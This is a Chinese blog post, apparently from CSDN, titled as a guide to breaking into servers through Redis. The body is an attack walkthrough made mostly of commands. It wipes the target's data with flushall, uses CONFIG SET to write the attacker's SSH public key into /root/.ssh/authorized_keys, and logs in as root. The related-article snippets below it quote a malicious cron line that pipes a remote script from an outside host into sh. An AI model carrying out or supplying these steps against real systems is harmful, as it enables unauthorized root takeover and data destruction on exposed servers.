利用redis入侵服务器

最新推荐文章于 2023-11-24 20:17:19 发布
最新推荐文章于 2023-11-24 20:17:19 发布
阅读量678 收藏
点赞数 1
分类专栏: redis Linux 文章标签: linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43641575/article/details/104020609
版权

通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。

一,生成本地ssh公钥
ssh-keygen 最后在/root/.ssh/id_rsa.pub这个文件里面
二,先连接redis看看

telnet 10.10.10.102 6379
redis-cli -h 10.10.10.102
三, 清一下redis数据库

redis-cli -h 10.10.10.102 flushall
四, 向redis写自己的公钥

(echo -e “\n\n”;cat /root/.ssh/id_rsa.pub;echo -e"\n\n")>key.txt /一定要加上换行符,不然传过去密钥他前面会有一些乱码就无法登陆
cat key.txt |redis-cli -h 10.10.10.102 -x set redis
五, 利用redis写入到文件中

#连接redis
#redis-cli -h 10.10.10.102
#查看keys
10.10.10.102>keys *
#写入配置库的路径及存放位置
10.10.10.102>CONFIG SET dir /root/.ssh/
#写入配置库名称及存放的名字
10.10.10.102>CONFIG SET dbfilename authorized_keys
#写入
10.10.10.102>save
#退出
10.10.10.102>exit
六, 远程连接

ssh root@10.10.10.102

恩霖大帅比
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis未授权访问配合SSH key文件利用详解
01-19
攻击者利用这种漏洞的常见手段是通过Redis的`config`命令写入SSH公钥到目标服务器的`~/.ssh/authorized_keys`文件,从而无需密码就能直接登录服务器。攻击者首先创建SSH密钥对,然后将公钥内容写入一个文本文件,...
使用redis构建简单的社交网站-model-for-netwo开发笔记
最新发布
06-09
本笔记将探讨如何利用Redis来构建一个简单的社交网站,主要关注其在模型-网络(Model-Network)开发中的应用。 一、Redis简介 Redis是一个开源的、支持网络的、内存中的数据结构存储系统,可作为数据库、缓存和消息...
通过Redis入侵服务器
******* ▄︻┻┳═一 *******
08-15 6268
通过redis入侵服务器的原理是:利用redis默认配置,许多用户没有设置访问的key(也就是密码)。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆步骤: 一、生成本地ssh公钥ssh-keygen二、先连接redis看看telnet 192.168.88.136 6379 redis-cli -h 192.168.8
redis之手入侵服务器
运维724
03-07 393
说明 利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。 原理 远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。 入侵演示 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可 bind 0.0.0.0 #允...
利用redis漏洞入侵服务器
yaoxiaofeng_000的专栏
04-12 1261
目标机:172.16.20.173登录机:172.16.20.55假设172.16.20.173 开放6379端口,并且暴露在公网上没有设置密码,嘿嘿,那么你就知道后面发生的事情了。首先把自己的公钥写到一个临时文件中,注意前后要加换行,不然会导致找不到对应的秘钥# $ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt# re...
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 878
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
记一次 LINUX 挖矿病毒 networkservice 分析 原因通过redis入侵
球球的博客
12-06 2151
单位ip被电信拉黑,原因恶意访问非法目的地; 通过安全防护软件分析一台服务器不断向国外不同国家发包请求;定位到服务器 192.168.2.110 登陆服务器一看cpu 爆满; 看是服务networkservice;不知所以然;百度一下 发现有同学已经中招了 定位是 挖矿病毒 networkservice; 清除的过程 使用top已经知道了进程号,接下来看看位置,命令ls -l pro...
使用redis构建简单的社交网站n-model-for开发笔记
06-08
本文将探讨如何利用Redis的特性来支持社交网站的核心功能,如用户资料、关注关系、消息推送等,并结合“cnn-bi-lstm-attention-model-for-network-ids-master”这个可能与网络入侵检测相关的项目,探讨其在安全防护...
redis加固.pdf
03-15
- 这样做可以降低攻击者利用 Redis 实现服务器权限提升的风险。 ##### 4. 服务精细化授权 - 通过重命名某些敏感命令,例如 `CONFIG`, `FLUSHDB`, `FLUSHALL` 等,将其设置为空或者复杂的名称。 - 示例配置: ```...
服务器
02-17
3. **缓存机制**:利用内存或专门的缓存服务(如Redis、Memcached)存储常用数据,减少硬盘读取,提高性能。 4. **日志管理**:有效管理和分析日志,及时发现并解决问题,保持服务稳定。 在服务器安全方面,应重视...
redis被黑客入侵
程序员陆通
02-12 1475
[root@iZ112fail84Z home]# redis-cli 127.0.0.1:6379> keys * 1) “crackit” 127.0.0.1:6379> get crackit “\n\n\n*/5 * * * * /usr/bin/curl -fsSL http://sx.doiton.tk/test.sh | sh\n\n\n\n”这个程序每5分钟执行一个shell
记录一次redis入侵事件(无重大影响)
大锅霍皮久的博客
04-08 7669
早上看到阿里云报警,提示”Linux系统计划任务配置文件写入行为“,虽然这个reids集群做在内网,可能因为做了本地端口转发,所以导致了入侵事件。1.现象于是上服务器,crontab -l 看到有一个定时任务写在计划任务中2.分析将这个脚本下载下来进行分析,wget https://transfer.sh/Yfso3/tmp.YmboB7ymVN脚本内容如下sleep 1 find . -maxd...
linux 连接redis_借redis之手入侵服务器
weixin_39647734的博客
11-26 145
说明利用redis端口暴露公网,且没有设置密码,能轻松入侵linux 服务器。原理远程连接redis,修改redis数据目录及文件为linux计划任务的目录,设置xx 键的值为计划任务,save数据后将会把该值写入计划任务文件,计划任务命令中可以执行任意脚本。入侵演示#### 1. 编译安装并配置 redis免密码,允许外部连接。主要修改以下参数,其他参数默认即可bind 0.0.0.0 #允...
redis 入侵
Henry_Wu001的专栏
07-22 220
redis 入侵
谨防利用Redis未授权访问漏洞入侵服务器
weixin_42100387的博客
11-24 1741
谨防利用Redis未授权访问漏洞入侵服务器
python如何入侵服务器的_通过redis入侵服务器的步骤
weixin_42524276的博客
01-12 559
通过redis入侵服务器的原理是:利用redis默认配置,许多用户没有设置访问的key。然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件。形成免密码登陆。一,生成本地ssh公钥ssh-keygen二,先连接redis看看telnet 192.168.15.10 6379redis-cli -h 192.168.15.10三, 清一下re...
H2Miner变种,利用Redis漏洞入侵服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
通过redis入侵服务器的步骤
weixin_34257076的博客
11-18 460
2019独角兽企业重金招聘Python工程师标准>>> ...
血的教训---入侵redis并远程控制你的机器场景复现
guijianchouxyz的博客
10-26 6915
不怕服务安装部署,就怕上任运维瞎部署防不胜防,全是泪,全是血
Redis服务器配置详解与实战调整
Redis服务器配置是管理和优化Redis服务的关键步骤。Redis的配置文件(默认为`redis.conf`或`redis.windows.conf`)存储了一系列设置,这些设置可以根据应用的需求进行调整。配置选项包括但不限于数据库的数量和行为...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值